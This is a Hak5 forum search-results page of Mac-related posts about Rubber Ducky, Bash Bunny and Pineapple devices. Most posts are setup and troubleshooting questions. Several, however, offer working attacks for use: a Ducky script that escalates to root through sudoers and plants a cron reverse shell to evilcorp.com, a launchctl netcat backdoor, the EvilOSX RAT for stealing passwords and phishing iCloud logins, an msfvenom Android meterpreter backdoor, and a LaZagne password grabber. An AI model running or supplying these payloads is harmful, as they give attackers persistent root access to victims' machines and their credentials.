Jump to content

Search the Community

Showing results for tags 'osx'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. My first payload, wanted to make something simple and cross-platform to try and learn the platform. Please give any feedback (I can't test on OSX myself) you may have to help me improve my payload writing! Features I'm looking to add that I need help with in a future version: - Loop so that the video opens multiple times before ending payload - Ability to crank up device volume while executing payload ######## INITIALIZATION ######## LED SETUP # Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET ATTACKMODE RNDIS_ETHERNET #ATTACKMODE ECM_ETHERNET ######## ATTACK PHASE (WINDOWS RUN PROMPT) ######## # Use this version if user cannot use CMD (lacking perms or something similar) LED ATTACK # Open run prompt Q GUI r Q DELAY 200 # Open web browser Q STRING microsoft-edge:// #Q STRING chrome Q ENTER Q DELAY 100 # Enter RickRoll link & enter it Q STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ Q ENTER ######## ATTACK PHASE (WINDOWS CMD) ######## #LED ATTACK # Open CMD #Q GUI r #Q DELAY 200 #Q STRING cmd #Q DELAY 100 #Q ENTER #Q DELAY 100 # Opens default web browser with video, cleans up cmd window #Q STRING start https://www.youtube.com/watch?v=dQw4w9WgXcQ && exit #Q ENTER ######## ATTACK PHASE OSX / *nix) ######## #LED ATTACK #Q GUI SPACE #Q DELAY 200 #Q STRING terminal #Q DELAY 100 #Q ENTER #Q DELAY 1000 #Q GUI n #Q DELAY 1000 #Q STRING open https://www.youtube.com/watch?v=dQw4w9WgXcQ && exit ######## FINISH ######## LED FINISH Github link: https://github.com/GlitchingGogo/BashBunny-SimpleRickRoll
  2. Hi...first time user, old Unix hack from long ago...some knowledge... 😉 I am trying to setup my O.MG Cable out of the box, and following the guide here: https://github.com/O-MG/O.MG_Cable-Firmware/wiki I have attempted using each of the three flashers, with same results. It seems like it does not see the USBtoUART device, even though it appears listed in /dev howard@imac /dev % ls -l tty.* crw-rw-rw- 1 root wheel 18, 2 Aug 9 01:49 tty.Bluetooth-Incoming-Port crw-rw-rw- 1 root wheel 18, 0 Aug 9 02:43 tty.SLAB_USBtoUART crw-rw-rw- 1 root wheel 18, 4 Aug 9 01:58 tty.usbserial-0001 I removed the device and confirmed the devices are not present. Here is the output of the scripts: <<< ALL FIRMWARE FILES LOCATED >>> <<< PROBING OSX DEVICES FOR O.MG-CABLE-PROGRAMMER >>> esptool.py v2.6 Serial port /dev/cu.SLAB_USBtoUART Connecting........_____....._____....._____....._____....._____....._____....._____ esptool.py v2.6 Serial port /dev/cu.usbserial-0001 <<< O.MG-CABLE-PROGRAMMER WAS NOT FOUND IN DEVICES, YOU MAY NEED TO INSTALL THE DRIVERS FOR CP210X USB BRIDGE >>> VISIT: [ https://www.silabs.com/products/development-tools/software/usb-to-uart-bridge-vcp-drivers ] I did confirm that I have Python 3.8x installed, and updated it's pip: howard@imac /dev % python3 -m pip --version pip 20.2.1 from /Library/Frameworks/Python.framework/Versions/3.8/lib/python3.8/site-packages/pip (python 3.8) From what I can tell, it either can't find the device, or it is looking for the wrong one...help? Thanks in advance...looking forward to stumbling my way through a bunch of Hak5 tools over the next few days, so any pointers greatly appreciated! H
  3. I was curious to see if the community had found any new information on this as currently I can't find any new information on Catalina compatibility that works or consistently works. It's not the end of the world as I just have to carry around another computer but it would be nice. Everything was working fine on a 2018 15" Pro on Mojave, but unfortunately that was stolen and without doing research I just got a 16" and Apple have tried a multitude of times to put Mojave on the 16" without success. Crossing fingers that someone. has stumbled upon a workaround. Thanks Hak5 community!
  4. I Have a few questions about the article "Stealing Files with the USB Rubber Ducky – USB Exfiltration Explained." I would like to know if that code for the payload would work for an OSX system and if it does not work what would be the changes needed for it to work. Also would I have tried to use the same payload for jpgs and photos but it does not seem to work, Is there a way for that to succeed or is it not possible. I would really appreciate it since that is the task I have been given. Thanks
  5. In the spirit of April fools, I've thrown together a payload that will rick roll every device you plug into at a specified time. It types up a script in the terminal (which at the specified time will crank up the volume and rick roll the target), runs it, sends it to the background, and closes the terminal so that the process can sit until the trigger time. Let me know if you'd like to see this do anything more! https://github.com/hak5/bashbunny-payloads/pull/139
  6. Trying to make a payload for a password grabber for mac osx having trouble with it while using the bash bunny. Can anyone help with my code? $filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1) Start-Process -FilePath ((-f 'label=''BashBunny''').Name+'payloads\switch2\laZagne.exe') -ArgumentList 'all -oN' -RedirectStandardOutput (( -f 'label=''BashBunny''').Name+'loot\PasswordGrabber\computer_' + $filecount +'.txt')
  7. having just bought the Bashbunny today i was so excited to get it working and do all sorts of things with it after having to wait for a week for it to ship to where i live :3, when i got it i updated the firmware using the osx bashbunny updater tool which worked great and that had me think that it was all going to be smooth sailing from there, but i got this feeling that things that have to do with IT never ever work that simply (at least with me) and luck would have it that i didn't have my windows box with me as i am traveling and i carry my mac with me as it is my daily driver. The suffering began when i wanted to share the internet connection with the bunny via the method which involves running a squid proxy, i followed the guide to the letter, but for some reason or another i couldn't run squid with the -Z command nor did i get it to work for me, after long hours of fiddling with it i decided to give up on that method and tried to look in the forum as well as youtube for another solution i found people suggesting running a payload which will test the connection, and fiddling with the internet sharing in mac (which gave me a massive headache because at times it would let me ssh to the bunny and disconnect the internet from my pc or it would let use the internet and not be able to ssh into the bunny) in the end i almost cried while staring at my terminal window with lifeless eye's it dawned on me that i have a very small linux box that i carry around with me (because in my head it makes sense and i convince myself that i'll find some use for it sometime) The raspberry pi which i lugg around which i haven't used for a while proved to be my savior, and so i boot it up i run the guided setup script and it works. but imagine this i'm sitting in my moms house on a sofa with a macbook connected to a raspberry pi connected to a bashbunny for the soul reason of wanting to update the linux distro on the bash bunny. Ps: the Guided Setup had me walk the walk of shame a couple of times during the setup process where it made you disconnect the bunny and connect it again. This might not be relevant to the topics that people usually post here (sorry if that's the case) but i had a lot of fun with this and i wanted to share it with someone xD.
  8. Please check git for the latest README/code https://github.com/stekole/bashbunny-payloads/tree/master/payloads/library/remote_access/untitled_EVILOSX untitled_EVILOSX + ______ _ _ ____ _____ __ __ + | ____| (_)| | / __ \ / ____|\ \ / / + | |__ __ __ _ | || | | || (___ \ V / + | __|\ \ / /| || || | | | \___ \ > < + | |____\ V / | || || |__| | ____) | / . \ + |______|\_/ |_||_| \____/ |_____/ /_/ \_\\ + untitled_ bash bunny edition / stekole ** Disclaimer: This RAT is for research purposes only, and should only be used on authorized systems. ** ** Accessing a computer system or network without authorization or explicit permission is illegal. ** Features Client reconnects automatically/persistence ECM_ETHERNET and HID attack Emulate a simple terminal instance. Sockets are encrypted with CSR via OpenSSL. No dependencies (pure python). Retrieve Chrome passwords. Retrieve iCloud contacts. Attempt to get iCloud password via phishing. Show local iOS backups. Download and upload files. Retrieve find my iphone devices. Attempt to get root via local privilege escalation (<= 10.10.5). Auto installer Configuration Server To prep your server you will need to download and follow the install instructions from EVILOSX. On your server, download the EvilOSX code and run your server. git clone https://github.com/Marten4n6/EvilOSX.git && cd EvilOSX ./Server and type your listening port (1337) Client Before you deploy your bash bunny, update your configuration in the EvilOSX.py file At the bottom of the file you will see a server and port variable Set these to your server IP and listening port ######################### SERVER_HOST = "10.99.99.16" SERVER_PORT = 1337 ######################### Usage Plug in your bash bunny and wait until the script has finished running. You should see the client connect to the server root@kali:~/git/EvilOSX# ./Server.py ______ _ _ ____ _____ __ __ | ____| (_)| | / __ \ / ____|\ \ / / | |__ __ __ _ | || | | || (___ \ V / | __|\ \ / /| || || | | | \___ \ > < | |____\ V / | || || |__| | ____) | / . \ |______|\_/ |_||_| \____/ |_____/ /_/ \_\ [?] Port to listen on: 1337 [I] Type "help" to get a list of available commands. > help help - Show this help menu. status - Show debug information. clients - Show a list of clients. connect <ID> - Connect to the client. exit - Close the server and exit. > clients [I] 1 client(s) available: 0 = client_hostname > connect 0 [I] Connected to "client_hostname", ready to send commands. Some of the other features can be found in the help menu. I have not tried them all help - Show this help menu. status - Show debug information. clients - Show a list of clients. connect <ID> - Connect to the client. get_info - Show basic information about the client. get_root - Attempt to get root via local privilege escalation. download <path> - Downloads the file to the local machine. upload <path> - Uploads the file to the remote machine. chrome_passwords - Retrieve Chrome passwords. icloud_contacts - Retrieve iCloud contacts. icloud_phish - Attempt to get iCloud password via phishing. itunes_backups - Show the user's local iOS backups. find_my_iphone - Retrieve find my iphone devices. screenshot - Takes a screenshot of the client. kill_client - Brutally kill the client (removes the server). exit - Exits the session. Any other command will be executed on the connected client. Removal of Tool The python script gets added to users ~/Library/ directory - and startup file is added to the ~/Library/LaunchAgents directory rm -rf ~/Library/Containers/.EvilOSX/ launchctl unload ~/Library/LaunchAgents/com.apple.EvilOSX.plist && rm -rf ~/Library/LaunchAgents/com.apple.EvilOSX.plist Defence disable the command-space short key for spotlight or disable spotlight all together if not needed Todo Issues I ran into a few issues with the "Build" of the python script. If the default one in this payload doesnt work, regenerate a new EvilOSX.py Run ./BUILDER and enter the appropriate information: After, copy this to your switch payload Thanks @Marten4n6 [YOURMOM](Check my room)
  9. I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks.. msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.43.128 lhost => 192.168.43.128 msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.128 yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.128:3344 msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
  10. Hi guys, I'm new here and need a bit of help regarding special characters along with the de.properties language file. My Ducky code requires the > sign (greater than), however by using the -l de.properties parameter my Rubber Ducky always writes a degree sign ° instead of >. In the properties file there is the following entry which should be fine: ASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT // 62 > On Windows this is working well, and that's why I'm thinking the properties file is correct. However, I need to get this work on my Mac as well. Do you have any tips? Thanks, David
  11. Hi, My MacBook Pro cannot find my newly bought Nano in the wp6.sh script, can anyone pls tell me why? It just keeps searching (.........) and never shows that it finds the device. If i do the same on a Linux machine it works fine. I can easily log in to the web interface on http://172.16.42.1:1471 Subsequent sessions may be quickly connected using saved settings. [C]onnect using saved settings [G]uided setup (recommended) [M]anual setup [A]dvanced IP settings [Q]uit Step 1 of 3: Select Default Gateway Default gateway reported as 192.168.0.1 Use the above reported default gateway? [Y/n]? Y Step 2 of 3: Select Internet Interface Internet interface reported as en0 Use the above reported Internet interface? [Y/n]? Y Step 3 of 3: Select WiFi Pineapple Interface Please connect the WiFi Pineapple to this computer. ................................................... ...................................................
  12. I found a script for ducky, that looked pretty cool, and also a thing I wanted to try. So I changed the details, for what I needed. To test how if it worked right (just if the text was right) I encoded it to open TextEdit instead of Terminal, now I got my inject.bin and plugged in my ducky. It opens TextEdit and types it in, BUT... for some reason it changes all > to § and < to $ it also changes ' to ’. I'm guessing it's because of the keyboard language but I'm using Danish keyboard and also encode it with Danish?? Sorry if bad English, and thx for any help and info given!
  13. I am trying to launch Kali Linux on my Macbook Pro and when I launch it using refind I get this error: "No bootable device -- Insert boot disk and press any key." My USB is working fine on other Macbooks, even older than mine. MPR Specifications: Macbook Pro 13" Early 2011 i5, 4 RAM Model Identifier: MacBookPro8,1 Hardware UUID: 1BC47169-1046-5052-B58F-F736330B7B6
  14. Step One : unpacked my Pineapple Nano Setup Two : Connected to my MacBook Air Initial setup screen says "Please ensure that the WiFi Pineapple is powered according to documentation for a successful firmware flash." Can anyone please point me to the 'Documentation' so that I can start with an RTFM [hoping to avoid a list of dumb questions]? Also - the Download section for Nano Firmware flash only includes Android Linux Windows so If I don't want to use my Macbook Air [forums seem to indicate it's more complicated - and I may not want to mess up my work laptop] does anyone have a recommendation between Android, Linux or Windows for a machine to use with my Pineapple Nano ? Should I figure out how to build a Kali Linux laptop ? [that would bee an other month long learning curve right ???]
  15. I can't even seem to connect to my new Nano there is no response on http://172.16.42.1:1471 I plug it in - it boots - blue light blinks - then goes solid ... My read of Ifconfig shows Nano is connected to en5 - but seems en5 has no IP address ??? Ifconfig output is below - and screen show is attached ... I'm stuck !!! Any ideas ? Is there a way to Hard Reset ?? ------------------------------------- en5: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500 options=4<VLAN_MTU> ether 00:c0:ca:8f:b6:11 inet6 fe80::2c0:caff:fe8f:b611%en5 prefixlen 64 scopeid 0xa nd6 options=1<PERFORMNUD> media: autoselect (100baseTX <full-duplex,flow-control>) status: active bridge100: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 options=3<RXCSUM,TXCSUM> ether 9a:e0:d9:79:10:64 inet 192.168.2.1 netmask 0xffffff00 broadcast 192.168.2.255 inet6 fe80::98e0:d9ff:fe79:1064%bridge100 prefixlen 64 scopeid 0xb Configuration: id 0:0:0:0:0:0 priority 0 hellotime 0 fwddelay 0 maxage 0 holdcnt 0 proto stp maxaddr 100 timeout 1200 root id 0:0:0:0:0:0 priority 0 ifcost 0 port 0 ipfilter disabled flags 0x2 member: en5 flags=3<LEARNING,DISCOVER> ifmaxaddr 0 port 10 priority 0 path cost 0 nd6 options=1<PERFORMNUD> media: autoselect status: active pineapple-setup-stuck.pdf
  16. Hi all, I'm looking at making a script on a CD-ROM, that will; recognise the operating system of the machine it has been inserted in to run a specific script for that operating system Is there a cross-platform script/code language that would be recognised by both Windows and OSX, as a standard build? I understand that Python, for example, could run on both, however this would require the user to have installed it. Is there a language that both OSX and Windows would recognise straight-out-of-the-box? I tried a few internet searches, but everything I find pretty much states you have to download additional files to the PC (e.g; installing Python), which is no good. Thank you.
  17. Hi, Looking for some help, total noob here. I've searched the forum and can't find any answers or similar problems to mine (i'm sure it's a simple noob error). Basically I've tried two different payloads, a simple "hello world" and a wall paper change. Both have the same issue which ends up with the desktop icons being re-named to the actual code that is in the text file / payload, whilst the payload is executing. As far as i'm aware the inject file is compiled correctly, and placed at the root of the ducky micro SD. I've also watched and followed the: Ducky quack start guideWith no luck. Any help or advice would be greatly appreciated (trying different delays right now). Cheers
  18. Hi! I'm new to the Rubber Ducky and to this community. I've made a simple payload to create a reverse bash in an OS X target by using crontab. I've seen some examples that use complicated generated plist files, and I'm not sure about what the advantage is over setting a cron to recover the session. Anyway, this is my payload: DELAY 2000 REM --------------- OPEN TERMINAL IN A NEW WINDOW --------------- COMMAND SPACE DELAY 300 STRING Terminal DELAY 300 ENTER DELAY 700 COMMAND n DELAY 500 REM --------------- ESCALATE PRIVILEGES --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER DELAY 200 REM --------------- RUN PAYLOAD --------------- STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1")| crontab - ENTER DELAY 200 REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 200 REM --------------- CLOSE TERMINAL --------------- STRING exit ENTER COMMAND Q What this does is: Open the terminal Magically grant sudo privileges (many thanks to V3sth4cks153 for this) Add a line to the root crontab to execute the reverse bash script every minute (replace «evilcorp.com» with your host / IP) Remove the newly added privileges to the current user in /etc/sudoers Close the terminal app The whole execution takes around 5 seconds. So now, all we have to do in our attacking machine is: sudo nc -l -p 443 We wait one minute (max) and we're in with root privileges Since the script is in root's crontab, we will always have root privileges, and if we close the connection, we can always re-take it. Another advantage is that by using port 443, the victim machine will not be blocked by any firewall. You can change the port to whatever you want. I just tested it on my girlfriend's Macbook Air and it works flawlessly. One thing that bothers me (remember, I'm new) is that some keys like the arrows don't work, so when I want to edit a file using vi, or something like that, I can't. Maybe you guys can point me to some solution to this? Same happens when I want to get files from the victim using FTP or SCP. When it's supposed to ask for my password, the connection stops responding and I have to re-connect. Hope you like it!
  19. I've flashed the cm_duck.hex firmware on my USB Rubber Ducky and I cannot get inject.bin or inject2.bin to execute on my Macbook (it works fine on a Windows computer). I've ensured that the caps lock light is on, and also tried pressing the button on the USB. The default duck.hex and c_duck_v2_S001.hex works (S001 requires pressing of button on USB) on my Macbook. Is OS X not supported by the cm_duck.hex firmware? Or am I doing anything wrong? Any help will be greatly appreciated
  20. Hi all, i bought a rubber ducky recently for bypass the EFI password like Teensy 3 https://www.youtube.com/watch?v=xXMiX-Bybsw But when typing the password, just type 1 ore 2 dot in the password case and after type enter, sometimes make nothing... anyone know the issue for that? Thanks in advance. Sorry for my bad english because i'm from belgium...
  21. Hello, I just ordered and received my first Rubber Ducky in the mail. Let me just say that I think it's an incredible piece of equipment. I do however have one problem. I wrote my first Payload in TextEdit, correctly encoded it (via Terminal) onto the MicroSD, and then loaded it into the Rubber Ducky. When I insert the Rubber Ducky into my USB slot, the commands are being carried out; but the GUI command is not cooperating with my Mac OSX. Here is my code: GUI SPACE is intended to execute COMMAND SPACE on my Mac OSX. The rest of the code just does random stuff with finder because the first command didn't work. To fix this problem I think I need to update the Firmware? To update the firmware I believe I need to flash the Ducky... But I haven't been able to do this using dfu-programmer-0.5.4 I have follow this tutorial: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky According to the README file on dfu-programming-0.5.4 I am supposed to "./configure", "make", and "make install" before I can flash the Ducky(From my understanding). I am able to configure the file, but when I type "make" / "make install" I get the error message "Fatal Error: usb.h not found". I have tried everything to get around this. If someone could please help me update the Firmware on my Rubber Ducky, or tell me what I am doing wrong I would greatly appreciate it.
  22. Can i use Ducky to install file on mac and run it when flash drive is plugged in.
  23. Hi everyone. I couldn't think of a better way to make a first post than to contribute some content. Here is a very very basic reverse shell ducky script that works on OS X. I've found the OS X payloads to be few and far between and I plan on posting many more of them here. Post yours too! I changed some stuff to be a little more verbose / easy to follow. Hope you enjoy (it's shockingly simple) REM title: osx reverse shell - execute in background - minimize terminal - run on startup DELAY 500 GUI SPACE DELAY 300 STRING terminal ENTER DELAY 600 STRING touch script.sh ENTER STRING echo "mkfifo foo" > script.sh ENTER STRING echo "nc 192.168.1.19 4444 <foo | /bin/bash 1>foo" >> script.sh ENTER STRING chmod +rwx script.sh ENTER STRING launchctl submit -l someName -p ~/script.sh ENTER STRING ./script.sh& ENTER STRING clear ENTER GUI m This simply creates a script with a netcat command that routes a command prompt to the host (192.168.1.19) on port 4444. It adds this script to the launch daemon so that it acts as a backdoor. Note however that because of the way the script is written, it will connect back on login, and not continuously attempt to connect back. It then runs it in background, clears the screen and minimizes. Enjoy, I will be posting more advanced payloads soon! -Shark3y
  24. Hi, I have a bit of a newbie question so thanks in advance for any replies. I have just ordered my first pineapple. Will the mark V automatically connect to a Mac OSX via ethernet? I'm not talking about sharing an internet connection at this point, but just accessing the pineapples web interface? I cannot find any information online. Even the Wiki page related to this in empty: http://wiki.wifipineapple.com/index.php/OSX_ICS Thanks.
  25. Hi guys ! I've just received my Rubber Ducky. I successfully managed to upgrade the firmware to the Duck 2.1 and change my VID/PID to skip the keyboard setup assistant on a mac. I've tried to use the osx user backdoor (reverse shell) payload, encode it with duck toolkit online and select "Français MAC" as language (i'm working on an azerty macbook pro). Everything seems to be okay (no azerty/qwerty problem), except one thing : the ~ character does not print. Somebody does have an idea?
×
×
  • Create New...